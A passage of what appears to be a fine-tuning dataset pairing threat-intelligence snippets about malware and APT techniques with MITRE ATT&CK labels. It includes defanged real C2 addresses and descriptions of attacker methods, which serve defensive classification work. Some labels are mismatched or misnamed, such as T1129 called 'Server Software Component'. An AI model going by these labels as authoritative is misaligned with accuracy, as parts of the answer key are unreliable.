"user", "content": "POWRUNER may collect information about the currently logged in user by running \"whoami\" on a victim." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FinFisher extracts and decrypts stage 3 malware, which is stored in encrypted resources." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The CAB file contains the following files and functions: dll: A malicious DLL used to launch batch files (used with cliconfg.exe for UAC bypass)" }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TinyTurla can use HTTPS in C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "With this approach, the attacker ensures that there is no direct execution (the executable is executed thanks to scheduled tasks), there's no download of an additional payload, and finally, the author uses the fact that the docx format is an archive in order to include its executable (GravityRAT" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TDTESS creates then deletes log files during installation of itself as a service." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Helminth config file is encrypted with RC4." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has been observed using a hard coded list of passwords to brute force user accounts." }, { "role": "assistant", "content": "T1110.001 - Brute Force: Password Guessing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques." }, { "role": "assistant", "content": "T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "identifies and kills anti-malware processes." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stealth Falcon malware encrypts C2 traffic using RC4 with a hard-coded key." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 can enumerate network adapter information." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. In the case of file 8892279f3. the remote location is http://185.203.119[.]184/Dropbox/request. and only continues if the file exists. 2) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. The content of both files is shown in the appendix section of this report. and only continues if the file exists" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Throughout the years, Kimsuky has been using an array of malware in their operations. The infrastructure of some of the malware used by Kimsuky can be tracked using pattern analysis of the URI structures used by some of their tools. The following table maps commonly observed URI patterns to their respective malware" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously-observed legitimate domains to host files" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec is capable of using DNS for C2." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak has the ability to identify the domain and the MAC and IP addresses of an infected machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MURKYTOP has the capability to delete local files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has searched for private keys in .ssh." }, { "role": "assistant", "content": "T1552.004 - Unsecured Credentials: Private Keys" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LookBack can take desktop screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ftp may be used to exfiltrate data separate from the main command and control protocol." }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PolyglotDuke can retrieve payloads from the C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs BIOS modification and can download and execute a file as well as protect itself from removal." }, { "role": "assistant", "content": "T1542.001 - Pre-OS Boot: System Firmware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RCSession can use an encrypted beacon to check in with C2." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IronNetInjector is made of an IronPython script that contains a .NET injector and one or more payloads. The payloads can be also .NET assemblies (x86/64) or native PEs (x86/64). When an IronPython script is run, the .NET injector gets loaded, which in turn injects the payload(s) into its own or a remote process" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "registers itself as a service by adding several Registry keys." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MechaFlounder uses a python-based payload." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has attempted to get users to execute malware via social media and spearphishing emails." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This spawns the hidden embedded malicious LNK file in the document" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Honeybee uses a batch file that configures the ComSysApp service to autostart in order to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "bypassed User Access Control (UAC)." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "leverages legitimate social networking sites and cloud platforms (Twitter, Yandex, and Mediafire) for command and control communications." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can communicate to its C2 over HTTP and HTTPS if directed." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor's dispatcher can establish persistence via adding a Registry key with a logon script \"HKEY_CURRENT_USER\\Environment \"UserInitMprLogonScript\" \"." }, { "role": "assistant", "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Night Dragon sent spearphishing emails containing links to compromised websites where malware was downloaded." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The VB.NET variant then gathers system information and running processes like other Zebrocy variants by running the following commands: systeminfo & tasklist The URL used to send the system information, running processes and a screenshot to the C2 server is: hxxp://109.248.148[.]42/agr-enum/progress-inform/cube.php?res=[serial number] The VB.NET variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows (notice the spaces before and after ampersand “&”): data=[system information and running processes] & arg=[screenshot in BMP format] C# Zebrocy Variant The C# variant of Zebrocy is similar to other variants in functionality, but also has several unique attributes that are worth discussing" }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1057 - Process Discovery', 'T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim to executing a malicious attachment" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic has used HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We identified that even though the downloaded installation executable was signed using a valid digital signature issued to Piriform, CCleaner was not the only application that came with the download. During the installation of CCleaner 5.33, the 32-bit CCleaner binary that was included also contained a malicious payload that featured a Domain Generation Algorithm (DGA) as well as hardcoded Command and Control (C2) functionality. We confirmed that this malicious version of CCleaner was being hosted directly on CCleaner's download server as recently as September 11, 2017. In reviewing the Version History page on the CCleaner download site, it appears that the affected version (5.33) was released on August 15, 2017. On September 12, 2017 version 5.34 was released. The version containing the malicious payload (5.33) was being distributed between these dates. This version was signed using a valid certificate that was issued to Piriform Ltd by Symantec and is valid through 10/10/2018. Piriform was the company that Avast recently acquired and was the original company who developed the CCleaner software application. This second sample was also signed using a valid digital certificate, however the signing timestamp was approximately 15 minutes after the initial sample was signed. It is also important to note that while previous versions of the CCleaner installer are currently still available on the download server, the version containing the malicious payloads has been removed and is no longer available" }, { "role": "assistant", "content": "T1195.002 - Compromise Software Supply Chain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KEYMARBLE can obtain a list of running processes on the system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses port 8000 and 443 for C2." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down." }, { "role": "assistant", "content": "T1542.003 - Bootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can use WMI to deliver a payload to a remote host." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "T9000 uses the Skype API to record audio and video calls. It writes encrypted data to \"%APPDATA%\\Intel\\Skype\"." }, { "role": "assistant", "content": "T1123 - Audio Capture', 'T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Command_Update_Server:  This command passes the string “Gh0st Update” to the malware sample before running the sample again.  When the sample restarts, it detects the “Gh0st Update” command line arg, and connects to the server in order to update the sample.  Command_Clean_Event:  This command locates and deletes all of the event logs on the system" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1059 - Command and Scripting Interpreter', 'T1070 - Indicator Removal on Host', 'T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot can modify registry entries." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda used custom batch scripts to collect files automatically from a targeted system." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used CVE-2015-4902 to bypass security features." }, { "role": "assistant", "content": "T1211 - Exploitation for Defense Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Writes itself to %AppData%\\Microsoft\\Word\\log.ps1 2) Sets up persistence for this file, using a run key. 3) Adds a registry key so that future powershell.exe instances are spawned off-screen by default – this trick is explained here. 6) Removes all registry entries that are left behind during the dropper process" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1564.003 - Hide Artifacts: Hidden Window', 'T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1/12/14 3/5/14 127.0.0.1 N/A 3/5/14 3/31/14 103.24.0.142 Hong Kong 3/31/14 10/27/14 103.24.1.54 Hong Kong 10/27/14 11/9/14 127.0.0.1 N/A 11/9/14 5/25/15 127.0.0.3 N/A 5/25/15 Current as of this publication 127.0.0.1 N/A Table 5" }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "63 64 ku64.dll ku32.dll Keylogger & clipboard monitor" }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. DLL side loading has been used to maintain persistence on the compromised system. Source: Dell SecureWorks) - ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. The server-side component provides a simple graphical user interface for threat actors interacting with web shells. TG-3390 has used additional web shells containing similarly formatted passwords" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the registry value is created, the attackers simply wait for the occasional execution of dllhost.exe, which might happen naturally on a system. This execution triggers a process launch of wscript.exe configured to run the VBScript file dropped in step #4" }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1546.012 - Event Triggered Execution: Image File Execution Options Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ServHelper has created a new user and added it to the \"Remote Desktop Users\" and \"Administrators\" groups." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TSCookie has the ability to decrypt, load, and execute a DLL and its resources." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to capture video from a victim machine." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOTHFULMEDIA has the capability to enumerate services." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nebulae has the capability to upload collected files to C2." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 1: SpeakUp’s Victim Distribution Figure 2: SpeakUp’s propagation rate per day Infection Vector The initial infection vector is targeting the recently reported vulnerability in ThinkPHP and uses command injection techniques for uploading a PHP shell that serves and executes a Perl backdoor" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process" }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Capable of stealing documents sent to the printer queue. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies" }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PipeMon can switch to an alternate C2 domain when a particular date has been reached." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Timezone Check The Trojan check to see if the system is configured (“DaylightName”) with one of the following time zones:   Arabic Daylight Time (UTC+3) Arab Daylight Time (UTC+3) Arabian Daylight Time (UTC+4) Middle East Daylight Time (UTC+2) Iran Daylight Time (UTC+3.5) Human Interaction Check Before executing its functional code, the Trojan presents a dialog box with the following line of code:   Interaction.MsgBox(encodedStringClass.return_user32_bogus_errorcode_(3), MsgBoxStyle.Critical, null);   This dialog box displays  An error occurred while processing user32.dll!, which the user must click the ok button for the Trojan to run its functional code" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "That new instance of RegAsm.exe is then responsible for handling the brunt of the malicious activity (data harvesting, exfiltration). We can also see frequent use of ‘Process Hollowing’ as an injection method. Process Hollowing allows for the creation or manipulation of processes through which sections of memory are unmapped (hollowed) with that space then being reallocated with the desired malicious code" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volatile Cedar has used DirBuster and GoBuster to brute force web directories and DNS subdomains." }, { "role": "assistant", "content": "T1595.003 - Active Scanning: Wordlist Scanning" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy has a module to clear event logs with PowerShell." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CaddyWiper can enumerate all files and directories on a compromised host." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remcos has a command for keylogging." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "adbupd contains a copy of the OpenSSL library to encrypt C2 traffic." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains code to open and copy data from the clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used links in e-mail to steal account information." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT-C-36 obtained and used a modified variant of Imminent Monitor." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal has the ability to inject the \"LoadLibrary\" call template DLL into running processes." }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An APT28 backdoor may collect the entire contents of an inserted USB device." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": 